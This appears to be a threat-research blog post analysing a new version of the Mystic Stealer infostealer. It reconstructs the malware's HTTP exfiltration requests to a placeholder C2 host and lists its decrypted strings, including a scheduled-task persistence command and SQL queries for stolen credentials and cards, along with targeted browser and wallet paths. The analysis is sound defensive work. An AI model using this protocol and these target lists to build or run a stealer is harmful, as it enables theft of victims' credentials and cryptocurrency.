Mystic Stealer Revisited

Introduction

Mystic Stealer is a relatively new downloader and information stealer that emerged in early 2023. The malware harvests data from a large number of web browsers and cryptocurrency wallet applications. Mystic can also be used to steal Steam game credentials and arbitrary files from an infected system. Mystic stands out for the level of obfuscation and improvements with each new version of the malware. The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to Mystic Stealer failing to beacon back to a C2 server in corporate environments, which frequently block network traffic on non-standard ports. The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner.

In this blog, we will analyze the latest updates to Mystic Stealer as a follow-up to our previous report.

Key Takeaways

• Mystic Stealer is an information stealer that was first advertised in April 2023, which targets nearly 40 web browsers and more than 70 browser extensions.
• Mystic Stealer has been regularly updated with improvements to its code obfuscation, configuration, and methods of communication.
• The malware’s command and control (C2) communications have been updated from a custom encrypted binary protocol to HTTP.
• Mystic Stealer has added loader functionality in recent versions to complement its information stealing abilities.
• Mystic Stealer has been used by numerous threat groups that leverage it to distribute second-stage malware payloads including RedLine, DarkGate, and GCleaner.

Technical Analysis

The latest variant of Mystic Stealer has introduced some notable changes in both the behavior of the malware and in the obfuscation. The entry point of the malware is very similar to the older variant. The malware exits if the current date is older than a specific hardcoded date. Figure 1 shows a comparison of the main function between the previous variant and the current variant.

_{Figure 1: Comparison of the WinMain function for the current and previous Mystic variants}

In the latest variant of Mystic Stealer, the decryption of the malware C2s has been moved to a sub-function that is executed after the expiration date (probably to avoid leaking the C2s in memory if this time check fails).

Embedded C2 Configuration

The algorithm used to decrypt the list of C2 is the same custom XTEA-based algorithm as the previous variant. However, after the custom XTEA layer has been decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2 path is stored among the list of obfuscated strings that are constructed and decoded using the stack as shown in Figure 2.

_{Figure 2. Mystic Stealer C2 path obfuscation}

Information Stealing Configuration

In the previous Mystic Stealer variant, the target lists for web browsers, extensions (and their IDs), and cryptocurrency applications were embedded and obfuscated in the malware. In recent versions, the application target list is now downloaded from the C2 server instead of being hardcoded, as we will examine in the following section.

Communications

In the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant that used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="<name>"


BASE64(<data>)
--<boundary>

The response data from the server is also encoded in Base64. The response starts with “OK\r\n” and is followed by any data returned by the C2 server for the specific query.

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <rest of data for the specific command, if necessary>)

Registration

The infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid, which includes a Base64 encoded bot ID generated based on information from the victim’s machine. A second variable with the name build contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="hwid"

BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"

BASE64(botnet_id)
--<boundary>--

The C2 server generates and returns a session token (a 64 byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicates which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc).

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)

When the bot submits information to the C2 server, it sends a POST request with:

• A filename variable containing the name of the file being submitted, Base64 encoded
• A file variable with the content of the file, also Base64 encoded
• A token variable with the session token from the registration request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("example.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of example.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

If the request is valid, the server answers with an OK response.

After registration, the bot sends information about the infected system via a file named SystemInformation.txt that contains information similar to the following:

Build mark: zzzz
IP: {ip}
File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe
UserName: xxxx
ComputerName: XXXX
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID: 0123456789ABCDEF012345
Current language: English (United States)
ScreenSize: 1792x1120
Operation System: Windows 10 Pro x64

Available KeyboardLayouts: 
English (United States)

Hardwares: 
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
GPU: VMware SVGA 3D
RAM: 4293898240ll

Information Stealing

Once Mystic Stealer has registered and reported the infected system information, the binary flags from the C2 server determine whether to conduct data theft and load additional malware payloads. Mystic Stealer sends HTTP POST requests for specific target lists by specifying the value in a msg variable.

Browsers

Depending on the configuration, Mystic Stealer will steal data from Chromium-based browsers by first requesting a target list from the C2 server.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("chromium-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The Mystic Stealer C2 server will respond with a list of Chromium-based browsers to target. The Appendix section shows the full list of browsers that have been targeted.

Citrio|%localappdata%\CatalinaGroup\Citrio\User 
Data|Coowon|%localappdata%\Coowon\Coowon\User 
Data|Liebao|%localappdata%\liebao\User 
Data|QIP Surf|%localappdata%\QIP Surf\User 
Data|Orbitum|%localappdata%\Orbitum\User 
Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User 
Data|Amigo|%localappdata%\Amigo\User\User 
Data|Torch|%localappdata%\Torch\User Data|Yandex 
Browser|%localappdata%\Yandex\YandexBrowser\User 
Data|Comodo|%localappdata%\Comodo\User 
Data|360Browser|%localappdata%\360Browser\Browser\User 
Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...

Each element of the list contains the name of the browser and the path where the browser’s data is stored: 

Browser name 1|Browser path 1|..............|Browser N|Browser path N

Mystic Stealer also retrieves a list of browser extensions to target.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64(extensions)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The Mystic Stealer C2 server will return the browser extensions configuration.

Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdg
oeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx 
Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp 
Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddoj
jnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW 
CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcgg
cfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin 
Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkp
anlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality 
Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra 
Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcg
hachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|...

In this case, each element contains the name of the extension and the ID.

Extension name 1|Extension ID 1|....|Extension name N|Extension ID N

Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server. This library is used to parse web browser SQLite database files.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("sqlite3")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The response is the sqlite3 DLL Base64 encoded, as shown below:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK BASE64(<sqlite3 file>))

The stolen browser data (if any) is sent to the C2 server. For example, cookies stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64(“Cookies/Microsoft_Edge_Default.txt”)
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Microsoft_Edge_Default.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

Depending on the configuration, Mystic Stealer will also retrieve a list gecko-browsers to target.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("gecko-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The configuration format is identical to the chromium-browser list.

Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo 
IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NET
GATE 
Technologies\BlackHawk\Profiles|Cyber
fox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mo
zilla\icecat\Profiles

Mystic Stealer will collect a number of database files from Firefox-based browsers containing cookies, certificates, keys, etc., as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/key4.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/cert9.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Cookies/Firefox_<profile>.default.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Firefox_<profile>.default.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

If the browser history configuration flag (position 4) is set to 1, Mystic Stealer also sends the victim’s browsing history.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("History/Firefox_8qjvd3qg.default-release.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

The browser history file contains the website title (if available) and the URL as shown below:

Title: <Title1>
Url: <url1>

===============

Title: <Title2>
Url: <url2>

===============

...

===============

Title: <TitleN>
Url: <urlN>

===============

Screenshots

If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer captures and sends a screenshot of the victim’s machine.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Screenshot.jpeg")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Screenshot.jpeg>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
–<boundary>--

Files

Mystic Stealer also downloads a list of files to be stolen from the victim.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("files")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The Mystic Stealer C2 server returns a list of target files and directories to steal. For example, ThreatLabz has observed this feature used to steal cryptocurrency wallets as shown below:

Wallets/Jaxx 
Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveld
b|*.*|0|Wallets/Atomic|%appdata%\atomic\Local 
Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.jso
n,simple-storage.json,.finger-print.fp|0|Wallets/Co
inomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exo
dus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info
.seco|1|Wallets/Bitcoin 
Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core 
Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitco
in\wallets|*wallet*.dat|0|Wallets/Raven 
Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus 
Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream 
Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi 
Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereu
m|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\w
allets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
|Wallets/Electron 
Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata%
\MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop 
Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0

The format for each targeted file is shown below:

Directory name|Location on disk|Target files mask|Flag

The flag parameter indicates whether Mystic Stealer should recursively search the target directory. Once finished, a “done” msg is sent, to indicate the file stealing task is finished.

Loader

A “loader” msg can be sent by Mystic Stealer to the C2 server to request additional second-stage malware payloads, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("loader")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN))

The response to the loader request is an initial Base64 encoded layer containing an OK response with a set of one or more Base64 encoded executables:

_{Figure 3: Base64 encoded executables downloaded by Mystic Stealer}

The packet follows this format:

|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)

The parameter that precedes the Base64 encoded executable does not appear to be currently used, although it may indicate a potential feature that has yet to be implemented such as whether to write the binary to disk or inject it into another process. After downloading and executing these binary payloads, Mystic Stealer sends a final POST request with the message “loadercode”. The C2 server will then return an empty response.

Debug Builds

Zscaler ThreatLabz has found recent samples compiled in September and October 2023, which contain plaintext strings that typically are obfuscated in other samples:

_{Figure 4: Mystic Stealer debug version plaintext strings}

In addition, these samples have string references with full file paths (instead of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the original C++ code. Interestingly, the username in these full paths is will. ThreatLabz suspects these samples are compiled from code that is still in development where they could be testing improvements and new features.

Conclusion

Even though Mystic Stealer is a relatively new information stealing malware, ThreatLabz has observed a significant increase in threat actors leveraging it to deploy additional malware. The developer behind Mystic Stealer is continuously modifying and improving the code, and the malware is quickly evolving. The C2 communication protocol used by Mystic Stealer has switched from a custom binary protocol to an HTTP-based protocol, likely to improve beaconing from infections in corporate environments that leverage firewalls to filter suspicious network traffic. Based on the number of new Mystic Stealer samples and C2 panels, the malware is likely to continue to pose a threat to organizations.

In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.

Cloud Sandbox

Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels.

Indicators of Compromise (IoCs)

Appendix

Decrypted Malware Strings

• %08lX%04lX%lu
• %ix%i
• %ls %ls
• %ls [%ls %d] ERROR in %s, line %d, function %s. %s
• %ls\\%ls
• %ls\\%ls\\Local State
• %ls\\*
• %ls\\Web Data
• %ls\\cookies.sqlite
• %ls\\formhistory.sqlite
• %ls\\places.sqlite
• %s/%s
• %userprofile%\\Telegram Desktop\\tdata
• &&\" **(# +
• &0'fg{199
• (ov_(ov
• ,+& ##*
• -t{d2
• ..*($2nd-2d-2o595
• ..\\stealer\\chromiumbrowsers.cpp
• ..\\stealer\\filesgrabber.cpp
• ..\\stealer\\geckobrowsers.cpp
• ..\\stealer\\httpclient.cpp
• ..\\stealer\\loader.cpp
• ..\\stealer\\sqlite3.cpp
• ..\\stealer\\stealer.cpp
• /c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn \"\\WindowsAppPool\\%ls\"
• LeaveCriticalSection
• EnterCriticalSection
• Advapi32.dll
• Autofills/%ls_%ls.txt
• Available KeyboardLayouts: Gonna gather system information
• Build mark: 
• CPU: 
• Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x
• Can't obtain RmStartSession's address, maybe windows don't support RestartManager
• Can't start process; last error: %x
• Can't write file; last error: %x
• Card: 
• Chromium browsers paths were retrieved
• ComSpec
• Command line: %ls
• ComputerName: 
• Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
• Content-Disposition: form-data; name=\"%s\"
• Content-Length: %d
• Content-Type: multipart/form-data; boundary=%s
• Cookies
• Cookies/%ls_%ls.txt
• Country: {country}
• CreditCards/%ls_%ls.txt
• Current language: 
• Default
• Email
• Email/Credentials.txt
• Email: 
• EnterCriticalSection
• Expand path: %ls
• Extensions were retrieved
• FALSE
• Failed to connect to %s
• Failed to download sqlite3.dll
• Failed to export functions from sqlite3.dll
• Failed to load sqlite3.dll
• Failed to retrieve chromium browsers paths
• Failed to retrieve files grabber paths
• Failed to retrieve gecko browsers paths
• File Location: 
• Files grabber paths were retrieved
• FilesGrabber: Sent %ls
• Find chromium cookies db %ls
• Find chromium extension %ls with id %ls
• Find chromium history db %ls
• Find chromium login data db %ls
• Find chromium web data db %ls
• Find gecko autofills db %ls
• Find gecko cookies db %ls
• Find gecko file %ls
• Find gecko history db %ls
• Find steam data, path %ls
• Gdi32.dll
• Gecko browsers were retrieved
• Gecko/%ls/%ls/%ls
• GetModuleHandleA
• Global\\%s%x
• Gonna gather system information
• Gonna grab ChromiumBrowsers
• Gonna grab GeckoBrowsers
• Gonna grab files
• Gonna grab outlook
• Gonna grab steam
• Gonna grab telegrab
• Gonna take screenshot
• GrabFiles
• HH':'mm':'ss
• HWID: 
• HandleChromiumBrowsers
• HandleGeckoBrowsers
• Hardwares: 
• History/%ls_%ls.txt
• Holder: 
• HttpOpenRequest fails; last error: %x
• HttpQueryInfo fails; last error: %x
• IMAP Password
• IP: {ip}
• InitializeCriticalSection
• InternetConnect fails; last error: %x
• InternetCrackUrl fails; last error: %x
• InternetOpen fails; last error: %x
• Kernel32.dll
• Key: 
• LeaveCriticalSection
• Location: {location}
• Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
• Name: 
• Network\\Cookies
• Ntdll.dll
• ..\\stealer\\geckobrowsers.cpp
• Ole32.dll
• Operation System: 
• POP3 Password
• Password: 
• ProductName
• Request
• Retrieve rule FilesGrabber, server side path: %ls
• Rstrtmgr.dll
• Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection
• SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted FROM credit_cards
• SELECT fieldname, value FROM moz_formhistory
• SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
• SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies
• SELECT origin_url, username_value, password_value FROM logins
• SELECT title, url FROM moz_places
• SELECT url, title FROM urlsFind chromium history db %ls
• SMTP Server
• ScreenSize: 
• Screenshot.jpeg
• Sent log. Gonna send done message
• Sent screenshot
• Software\\Microsoft\\Office
• Software\\Valve\\Steam
• Sq~70
• SrartLoader
• Start
• SteamPath
• Successfully connected to %s
• Successfully start process
• SystemInformation.txt
• Telegram
• There's file to load. Gonna load it
• TimeZone: {timezone}
• Title: 
• Tkernel32.dll
• Token retrieved: %s
• Trying to connect to %s
• URL: 
• USERPROFILE|tELEGRAMdESKTOP|TDATA
• Url: 
• User32.dll
• UserName: 
• Username: 
• Value: 
• Wallets/%ls_%ls_%ls
• Wininet.dllCrypt32.dll
• Wininet.dllCrypt32.dllGdiplus.dll
• Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll
• Write file content in %ls
• Zip code: {zipcode}
• abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
• build
• cert8.db
• cert9.db
• chromium-browsers
• computername
• encrypted_key
• extensions
• filename
• files
• done
• files
• gecko-browsershi
• Sent system information
• kernel32.dll
• key3.db
• key4.db
• loader
• loghub/master
• logins.json
• msgtzn
• SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
• signons.sqlite
• sqlite3
• sqlite3_close
• sqlite3_column_blob
• sqlite3_column_bytes
• sqlite3_column_text
• sqlite3_open
• sqlite3_open_v2
• sqlite3_open_v2sqlite3_finalize
• sqlite3_prepare_v2
• sqlite3_step
• token
• username
• wallets\\

Targeted Chromium Browsers

• Citrio|%localappdata%\CatalinaGroup\Citrio\User Data
• Coowon|%localappdata%\Coowon\Coowon\User Data
• Liebao|%localappdata%\liebao\User Data
• QIP Surf|%localappdata%\QIP Surf\User Data
• Orbitum|%localappdata%\Orbitum\User Data
• Comodo Dragon|%localappdata%\Comodo\Dragon\User Data
• Amigo|%localappdata%\Amigo\User\User Data
• Torch|%localappdata%\Torch\User Data
• Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data
• Comodo|%localappdata%\Comodo\User Data
• 360Browser|%localappdata%\360Browser\Browser\User Data
• Maxthon3|%localappdata%\Maxthon3\User Data
• K-Melon|%localappdata%\K-Melon\User Data
• Sputnik|%localappdata%\Sputnik\Sputnik\User Data
• Nichrome|%localappdata%\Nichrome\User Data
• CocCoc|%localappdata%\CocCoc\Browser\User Data
• Uran|%localappdata%\Uran\User Data
• Chromodo|%localappdata%\Chromodo\User Data
• Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data
• Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data
• Opera|%appdata%\Opera Software\Opera Stable
• Google Chrome|%localappdata%\Google\Chrome\User Data
• Microsoft Edge|%localappdata%\Microsoft\Edge\User Data
• Chromium|%localappdata%\Chromium\User Data
• Opera|%localappdata%\Opera Software|ChromePlus
• %localappdata%\MapleStudio\ChromePlus\User Data
• Irpathium|%localappdata%\Irpathium\User Data
• 7Star|%localappdata%\7Star\7Star\User Data
• CentBrowser|%localappdata%\CentBrowser\User Data
• Chedot|%localappdata%\Chedot\User Data
• Vivaldi|%localappdata%\Vivaldi\User Data
• Kometa|%localappdata%\Kometa\User Data
• Elements Browser|%localappdata%\Elements Browser\User Data
• Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data
• Uran|%localappdata%\uCozMedia\Uran\User Data
• Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer

Targeted Gecko Browsers

• Firefox|%appdata%\Mozilla\Firefox\Profiles
• Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles
• BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles
• Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles
• K-Meleon|%appdata%\K-Meleon\Profiles
• Icecat|%appdata%\Mozilla\icecat\Profiles

Targeted Browser Extensions

• Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad
• Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln
• EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac
• Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne
• BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi
• iWallet|kncchdigobghenbbaddojjnnaogfppfj
• Wombat|amkmjjmmflddogmhpjloimipbofnfjih
• MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm
• GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj
• Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig
• Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec
• NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao
• CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk
• Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn
• Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp
• Keplr|dmkamcknogkgcdfhhbddcghachkejeap
• Sollet|fhmfendgdocmcbmfikdcogofphimnkno
• Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae
• Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf
• ICONex|flpiciilemghbmfalicajoolhkkenfel
• Nabox Wallet|nknhiehlklippafakaeklbeglecifhad
• KHC|hcflpincpppdclinealmandijcmnkbgn
• MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn
